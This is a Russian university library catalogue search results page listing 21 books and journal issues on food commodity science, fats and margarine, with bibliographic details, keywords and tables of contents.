Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

101 пользователей


Зарегистрированных: 1 

Федоров Владимир Леонидович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Маргарин")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 21
1. 
Экспертиза масел, жиров и продуктов их переработки. Качество и безопасность [Текст] / Е. П. Корнена [и др.] ; ред. В. М. Позняковский ; дар. О. Д. Худякова, 2007. - 269, [1] с.
Держатели документа (Информация об экземплярах) 

Пособие входит в серию "Экспертиза пищевых продуктов и продовольственного сырья". Содержит наиболее полный учебно-справочный материал по вопросам качества, безопасности и экспертизе масел, жиров и продуктов их переработки.

Представлена следующая информация по рассматриваемой группе пищевых продуктов: основные понятия, классификация, ассортимент и товароведная характеристика, технология производства, экспертиза качества и безопасности (органолептические, физико-химические, микробиологические показатели, дефекты, идентификация), упаковка, маркировка, транспортирование и хранение.

Пособие предназначено для студентов высших учебных заведений, обучающихся по направлениям и специальностям указанного пищевого профиля.

Имеет практическую значимость для работников пищевой и перерабатывающей промышленности, специалистов экспертных (инспекционных, оценочных) организаций, органов по сертификации, испытательных лабораторий, аудиторских и сюрвейерских фирм, занимающихся вопросами качества и безопасности продуктов питания.

2. 
Экспертиза продовольственных товаров: Лабораторный практикум [Текст] / сост. Ю. И. Сидоренко [и др.] ; ред. Ю. И. Сидоренко, 2013. - 180, [1] с.
Держатели документа (Информация об экземплярах) 

В лабораторном практикуме изложены методы экспертизы качества основных групп продовольственных товаров, сгруппированных согласно учебной товароведческой классификации.

Приведены примеры экспертизы основных видов продовольственных товаров в каждой товароведческой группе. Рассмотрены нормативная база, состоящая из основных нормативных документов, относящихся к данной товароведческой группе, основные термины и определения, касающиеся технологии и оборота товаров данной товароведческой группы. Приведены основные методы оценки по органолептическим и физико-химическим показателям товаров.

Лабораторный практикум предназначен для студентов, обучающихся по специальностям 260504.65 "Технология консервов и пищеконцентратов", 260505.65 "Технология детского и функционального питания" и 260503.65 "Технология субтропических и пищевкуковых продуктов".

3. 
Товароведение пищевых продуктов [Текст] / И. Е. Кононенко [и др.], 1983. - 423 с.
Ключевые слова 
СОСТАВ ХИМИЧЕСКИЙ - ПРОДУКТЫ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- ПРОДУКТЫ ПИЩЕВЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ХЛЕБ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- Овощи -- Плоды -- Грибы -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КИСЛОТА ПИЩЕВАЯ -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- МЯСО -- СУБПРОДУКТЫ -- МЯСО ПТИЦЫ -- МЯСО КРОЛИКОВ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- МОЛОКО СГУЩЕННОЕ -- МОЛОКО СУХОЕ -- МОРОЖЕНОЕ -- СЫР -- МАСЛО КОРОВЬЕ -- ЯЙЦА -- Рыба -- ИКРА -- ЖИР ПИЩЕВОЙ -- МАРГАРИН
Держатели документа (Информация об экземплярах) 
4. 
Товароведение однородных групп продовольственных товаров [Текст] / ред. Л. Г. Елисеева, 2014. - 929 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МАРКИРОВКА ТОВАРА -- УПАКОВКА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ТОВАРЫ ПЛОДООВОЩНЫЕ -- ПОТЕРИ ПЛОДОВ -- ПОТЕРИ ОВОЩЕЙ -- КОНСЕРВИРОВАНИЕ ПЛОДООВОЩНОЙ ПРОДУКЦИИ -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ САХАРИСТЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- СПРЕД -- МАЙОНЕЗ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОРОЖЕНОЕ -- МАРКИРОВКА МОЛОЧНОЙ ПРОДУКЦИИ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ ДЕТСКОЕ -- МЯСО -- МЯСО ПТИЦЫ -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ

Учебник подготовлен в соответствии с образовательным стандартом третьего поколения – ФГОС ВПО по направлению подготовки «Товароведение» по базовой дисциплине профессионального цикла «Товароведение однородных групп продовольственных товаров».

В нем рассматриваются основные понятия и задачи товароведения продовольственных товаров, научные принципы систематизации и классификации продовольственных товаров, факторы, влияющие на формирование и сохранение их потребительских свойств. Дана характеристика пищевой ценности и потребительских свойств однородных групп продовольственных товаров, представлены современные принципы их классификации и кодирования, изложены требования к качеству и безопасности, рассмотрены основные дефекты и причины их возникновения, режимы хранения и сроки годности.

Для студентов бакалавриата, обучающихся по направлениям подготовки «Товароведение», «Торговое дело», «Технология продукции и организация общественного питания» и «Экономика».

5. 
Арет В. А. Физико-механические свойства сырья и готовой продукции [Текст] / В. А. Арет, Б. Л. Николаев, Л. К. Николаев ; дар. В. В. Арсеньев, 2009. - 442, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии широко освещены и теоретические, и экспериментальные составляющие курса. Изложены основы инженерной реологии и ее применения в расчетах оборудования жиолслдержащих пищевых продуктов. Приведены выводы расчетных зависимостей, что облегчает понимание физической и математической сущности рассматриваемых вопросов. Достаточно полно представлены экспериментальные данные реометрии мноших жиросодержащих продуктов при их различных фазовых состояниях: застывшем состоянии, в стадии плавления и в расплавленном виде. Экспериментальные данные приводятся в широком интервале градиента скорости и касательного напряжения, что возволяет использовать их для расчета различного оборудования.

6. 
Химия и жизнь - XXI век. - Журнал, 2004г. № 3
Оглавление 
  • Метан в плену у древней соленой воды. - с.4
  • Магнитные ловушки для нефти. - с.4
  • Фантомы человека в космосе. - с.5
  • Метадон не лучше героина. - с.6
  • Любителям "винта" и "ханки" грозит СПИД. - с.6
  • Лазер против болезни Паркинсона. - с.7
  • Благутина, В. В. Палладий / В. В. Благутина. - с.8-12
  • Маргарин с палладием вместо никеля. - с.12
  • Как найти микротрещину в металле?. - с.12
  • Комаров, С. М. Топливный перекресток / С. М. Комаров. - с.13-17
  • Семенов, А. Светлое будущее без проводов / А. Семенов. - с.18-21
  • [Способы ориентирования кротов]. - с.22
  • [Источники глазных инфекций]. - с.22
  • [Вреден ли алкоголь? ]. - с.22
  • [Животные-попрошайки]. - с.23
  • [Как спасти Венецию? ]. - с.23
  • [Возможности человеческого мозга]. - с.23
  • [Фтор в борьбе с кариесом]. - с.23
  • Малыгин, А. Г. Технологии для края снега и льда / А. Г. Малыгин. - с.24-28
  • Влияние холода на российскую государственность. - с.29
  • Глазков, В. В. Следующий этап в эволюции разума / В. В. Глазков. - с.30-33
  • Багоцкий, С. В. Бактерия, инфузория и слон как три варианта клеточной эволюции / С. В. Багоцкий. - с.34-37
  • Котина, Е. Недостающее звено / Е. Котина. - с.38-39
  • Евсюнин, А. Неподвижные хищники: грибы берут реванш / А. Евсюнин. - с.40-41
  • Прозоров, А. А. Белое и черное. Изменчивость окраски березовой пяденицы: полтораста лет изучения / А. А. Прозоров. - с.42-45
  • Черников, А. М. Via vite - улица жизни / А. М. Черников. - с.46-50
  • Гумеров, М. Ф. Разделение хроматографии / М. Ф. Гумеров. - с.51-53
  • Леенсон, И. А. Откуда твое имя? / И. А. Леенсон. - с.54-57
  • Намер, Л. Не греет, но светит / Л. Намер. - с.57
  • Яхнин, Е. Д. "Сэр" / Е. Д. Яхнин. - с.58-61
  • Литвинов, М. Прививка для российской биотехнологии / М. Литвинов. - с.64-65
  • , Евгений николаевич "Цель эксперимента - построить взаимоотношения между государством и частным сектором". - с.66
  • Горзев, Б. Сквозняк / Б. Горзев. - с.67-69
  • Ефремкин, А. От плоского камешка - к летающей тарелке? / А. Ефремкин. - с.70
  • Сутоцкая, Е. Два в одном / Е. Сутоцкая. - с.71
  • Портрет современницы. - с.72
Держатели документа (Информация об экземплярах) 
7. 
Пищевые ингредиенты: сырье и добавки. - Журнал, 2009г. № 1
Оглавление 
  • Диеты и здоровое питание. - с.18-19
    Кл. слова: ДИЕТА
  • Борисенко, Е. В. Роль пищевых добавок в современной экономической ситуации / Е. В. Борисенко, С. А. Климова. - с.24-26
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Прянишников, В. В. Полный спектор животных белков "Могунции" для антикризисной программы / В. В. Прянишников, П. Микляшевски, А. В. Ильтяков. - с.28-31
    Кл. слова: БЕЛОК
  • Технологические аспекты получения функционального сахаро-стевиозидного продукта. - с.31-33
    Кл. слова: ПРОДУКТ сахаро-стевиозидный
  • Кочеткова, А. А. Пектин. О многих гранях одного ингредиента / А. А. Кочеткова, Л. Г. Ипатова. - с.34-38
  • Перковец, М. В. Инулин и олигофруктоза - натуральные пребиотики в питании детей раннего возраста / М. В. Перковец. - с.40-41
    Кл. слова: ОЛИГОФРУКТОЗА, ПИТАНИЕ ДЕТЕЙ
  • Придатко, Е. Специализированные маргарины для слоеного теста под торговой маркой "Эколайс" компании ЭФКО / Е. Придатко. - с.42-43
    Кл. слова: МАРГАРИН
  • Бакулина, О. Н. Каротиноиды / О. Н. Бакулина, Т. Э. Некрасова. - с.44-46
  • Шендеров, Б. А. Молекулярный язык пробиотических микроорганизмов / Б. А. Шендеров. - с.47-48
  • Черно, Н. К. Состав и функционально-физиологические свойства концентратов пищевых волокон / Н. К. Черно. - с.52-53
  • Смирнов, Е. В. Новый Европейский регламент по ароматизаторам / Е. В. Смирнов. - с.60-65
    Кл. слова: АРОМАТИЗАТОР ПИЩЕВОЙ
  • Рудометова, Н. В. Методы установления фальсификации пищевых продуктов / Н. В. Рудометова. - с.68-69
    Кл. слова: ФАЛЬСИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТОВ
  • Новинюк, Л. В. Цитраты - безопасные нутриенты / Л. В. Новинюк. - с.70-71
    Кл. слова: НУТРИЕНТЫ
  • Шарова, Н. Ю. Новая пищевая добавка антидиабетического действия / Н. Ю. Шарова, О. А. Ходкевич. - с.71-73
  • Забодалова, Л. А. Йогурт с лактатсодержащими ингредиентами / Л. А. Забодалова, А. Л. Рублев, В. В. Евелева. - с.73
  • Ржаной крахмал - потенциальное сырье для получения лимонной кислоты. - с.74-75
    Кл. слова: КРАХМАЛ, КИСЛОТА ЛИМОННАЯ
Держатели документа (Информация об экземплярах) 
8. 
Кондитерское и хлебопекарное производство. - Журнал, 2008г. № 9
Оглавление 
  • Агафонычев, В. П. Качество сухих яичных продуктов / В. П. Агафонычев, Т. И. Петрова, С. С. Кругалев. - с.3-6
    Кл. слова: ЯЙЦЕПРОДУКТЫ
  • Яичные продукты от "Роскара". Оптимальное решение. - с.7
  • Торт шоколадно-банановый с сухими яйцепродуктами. - с.8-9
    Кл. слова: ТОРТЫ
  • Бойцова, Е. Е. Новые виды сырья при производстве сбивных конфет / Е. Е. Бойцова. - с.10
    Кл. слова: КОНФЕТЫ
  • Гаврилова, О. М. Применение гречневой муки при производстве хлебобулочных изделий / О. М. Гаврилова. - с.12
    Кл. слова: МУКА гречневая, ХЛЕБ - ПРОИЗВОДСТВО
  • Скороженко, М. П. Влияние маргаринов на качество дрожжевых слоеных изделий / М. П. Скороженко. - с.14-16
    Кл. слова: ТЕСТО ДРОЖЖЕВОЕ, МАРГАРИН
  • Петрова, И. А. Новый эквивалент какао-масла / И. А. Петрова. - с.18
    Кл. слова: КАКАО - МАСЛО
  • Киреев, А. На пути к автоматизации производства тортов / А. Киреев. - с.20-22
  • Рудаков, О. Б. Стевия и стевиозид как натуральные подсластители / О. Б. Рудаков, Л. В. Рудакова. - с.23-26
    Кл. слова: СТЕВИЯ, СТЕВИОЗИД
  • Новые эмульгаторы для хлебопекарной промышленности. - с.27
    Кл. слова: ЭМУЛЬГАТОР
  • Оптимизация технологии производства быстрозамороженныхх изделий. - с.29-30
    Кл. слова: ИЗДЕЛИЯ БЫСТРОЗАМОРОЖЕННЫЕ
  • Хиллиам, М. Мировые тенденции развития ассортимента функциональных кондитерских изделий / М. Хиллиам. - с.31-33
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ
Держатели документа (Информация об экземплярах) 
9. 
Кондитерское и хлебопекарное производство. - Журнал, 2008г. № 1
Оглавление 
  • Использование соевого молока при производстве мучных изделий. - с.2-3
    Кл. слова: МОЛОКО СОЕВОЕ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Музыка, Л. А. Мягкие маргарины с длительным сроком годности для кулинарии и кондитерского производства / Л. А. Музыка. - с.4-6
    Кл. слова: МАРГАРИН
  • Тукачев, В. Е. Высокотемпературная сушка макаронных изделий / В. Е. Тукачев. - с.8-11
    Кл. слова: СУШКА МАКАРОННЫХ ИЗДЕЛИЙ
  • Шамков, Ю. А. Проблемы качества зерновых смесей / Ю. А. Шамков. - с.12-14
    Кл. слова: ЗЕРНО
  • Конфеты ручной работы. - с.15-19
    Кл. слова: КОНФЕТЫ
  • Дубцов, Г. Г. Шафран: пряность известная и забытая / Г. Г. Дубцов. - с.20-21
    Кл. слова: ШАФРАН
  • Торт " Банановый". - с.22-23
    Кл. слова: ТОРТЫ
  • Производство изделий из слоеного теста. - с.24-26
    Кл. слова: ТЕСТО СЛОЕНОЕ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
Держатели документа (Информация об экземплярах) 
10. 
Дубцов Г. Г. Товароведение продовольственных товаров [Текст] / Г. Г. Дубцов, 2014. - 333 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЦЕННОСТЬ ФИЗИОЛОГИЧЕСКАЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- СОЛОД -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- КОРНЕПЛОДЫ -- ОВОЩИ -- ПЛОДЫ -- САХАР -- КРАХМАЛ -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ПИВО -- КВАС -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- ПРЯНОСТИ -- МОЛОКО -- СЛИВКИ -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОЛОКО СУХОЕ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- МАСЛО КОРОВЬЕ -- МЯСО -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- МЯСОКОПЧЕНОСТИ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ЖИР ПИЩЕВОЙ -- МАРГАРИН -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДРОЖЖИ -- ВОДА -- УПАКОВКА -- ПОСУДА ОДНОРАЗОВАЯ
Держатели документа (Информация об экземплярах) 
11. 
Пашук З. Н. Мучные кондитерские изделия [Текст] / З. Н. Пашук, Т. К. Апет, 1997. - 459 с.
Ключевые слова 
ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОИЗВОДСТВО КОНДИТЕРСКОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- МУКА -- КРАХМАЛ -- САХАР -- МЕД -- ПАТОКА -- ЯЙЦА -- МОЛОКО -- МАСЛО -- МАРГАРИН -- ЖИР -- ФРУКТЫ -- ЯГОДЫ -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДОБАВКА АРОМАТИЧЕСКАЯ -- ДОБАВКА ВКУСОВАЯ -- ОРЕХИ -- МАК -- ПЕЧЕНЬЕ САХАРНОЕ -- ПЕЧЕНЬЕ ЗАТЯЖНОЕ -- ПЕЧЕНЬЕ СДОБНОЕ -- ГАЛЕТЫ -- КРЕКЕР -- ВЫПЕЧКА ПЕЧЕНЬЯ -- ПРЯНИК -- КЕКС -- БАБА РОМОВАЯ -- ТОРТ -- СИРОП -- ПОМАДА -- КАРАМЕЛЬ -- КАНДИР ДЛЯ САХАРНЫХ ФИГУР -- КРЕМ -- МАРЦИПАН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ - ТРЕБОВАНИЯ САНИТАРНЫЕ -- ПРАВИЛА ЛИЧНОЙ ГИГИЕНЫ -- СРЕДСТВА МОЮЩИЕ -- СРЕДСТВА ДЕЗИНФИЦИРУЮЩИЕ -- ОСМОТР МЕДИЦИНСКИЙ ЕЖЕСМЕННЫЙ -- ЛАМПА БАКТЕРИЦИДНАЯ
Держатели документа (Информация об экземплярах) 
12. 
Барановский В. А. Продавец [Текст] : Учеб. пособие для уч-ся учеб. заведений нач. проф. образования / В. А. Барановский, Л. И. Рубцова, В. А. Тимофеева, 2003. - 447 с.
Ключевые слова 
ПРОДАВЕЦ -- ТОВАРОДВИЖЕНИЕ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- КООПЕРАЦИЯ ПОТРЕБИТЕЛЬСКАЯ -- МАГАЗИН - Планировка -- ЗАЛ ТОРГОВЫЙ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАН -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- АССОРТИМЕНТ ТОВАРНЫЙ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ТОВАРООБОРОТ -- ПРИЕМКА ТОВАРОВ -- РАБОЧЕЕ МЕСТО продавца -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- НАПИТОК АЛКОГОЛЬНЫЙ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
13. 
Барановский В. А. Кондитер [Текст] : Учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Т. И. Перетятко, 2003. - 381 с.
Держатели документа (Информация об экземплярах) 
14. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
15. 
Товароведение и экспертиза пищевых жиров, молока и молочных продуктов [Текст] : Учебник гриф-УМО / под ред. М. С. Касторных, 2003. - 288 с.
Держатели документа (Информация об экземплярах) 
16. 
Чепурной И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учеб. / И. П. Чепурной , 2007. - 459 с.
Держатели документа (Информация об экземплярах) 
17. 
Барановский В. А. Продавец [Текст] : учеб. пособие для учащихся колледжей и средних проф.-тех. училищ / В. А. Барановский, 2000. - 412 с.
Ключевые слова 
ПРОДАВЕЦ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- МАГАЗИН - ПЛАНИРОВКА -- ТОВАРОСНАБЖЕНИЕ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАНСПОРТНОЕ -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- ПРАВИЛА работы магазина -- ОРГАНИЗАЦИЯ РАБОЧЕГО МЕСТА продавца -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ПРИЕМКА ТОВАРОВ -- РЕКЛАМА ТОРГОВАЯ -- ОХРАНА ТРУДА - МАГАЗИН -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ОВОЩИ -- МУКА -- КРУПА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
18. 
Товароведение и экспертиза потребительских товаров [Текст] / В. В. Шевченко [и др.] ; рук. работы В. В. Шевченко, 2014. - 751 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ЭКСПЕРТИЗА ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СОСТАВ ХИМИЧЕСКИЙ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ВОДА -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- УГЛЕВОДЫ -- ЛИПИДЫ -- ЖИРЫ -- ЛИПОИДЫ -- ВЕЩЕСТВА АЗОТСОДЕРЖАЩИЕ -- ВИТАМИН -- ФЕРМЕНТ -- КИСЛОТА ОРГАНИЧЕСКАЯ -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПЛОДЫ СВЕЖИЕ -- ЯГОДЫ -- ОРЕХИ -- ОВОЩИ -- ТОВАРЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ВИНО ВИНОГРАДНОЕ -- БРЕНДИ -- КОНЬЯК -- ИЗДЕЛИЯ ТАБАЧНЫЕ -- КРАХМАЛ -- КРАХМАЛОПРОДУКТЫ -- САХАР -- ЗАМЕНИТЕЛЬ САХАРА -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- СЛАДОСТИ ВОСТОЧНЫЕ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- МОЛОКО -- КОНСЕРВЫ МОЛОЧНЫЕ -- СЫР -- МАСЛО -- МОРОЖЕНОЕ -- ЖИРЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ ПИЩЕВЫХ ЖИРОВ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИР ТОПЛЕНЫЙ -- МАРГАРИН -- МАЙОНЕЗ -- ТОВАРОВЕДЕНИЕ МЯСНЫХ ПРОДУКТОВ -- МЯСО -- МЯСО ПТИЦЫ -- КОНСЕРВЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ РЫБНЫХ ПРОДУКТОВ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ИКРА -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- МОРЕПРОДУКТЫ
Держатели документа (Информация об экземплярах) 
19. 
Маркман А. Маргарин [Текст] / А. Маркман, 1928. - 31 с. с.
Держатели документа (Информация об экземплярах) 
20. 
Барановский В. А. Кондитер [Текст] : учеб. пособие для уч-ся колледжей и сред. проф.-тех. училищ / В. А. Барановский, 2000. - 318 с.
Держатели документа (Информация об экземплярах) 
21. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
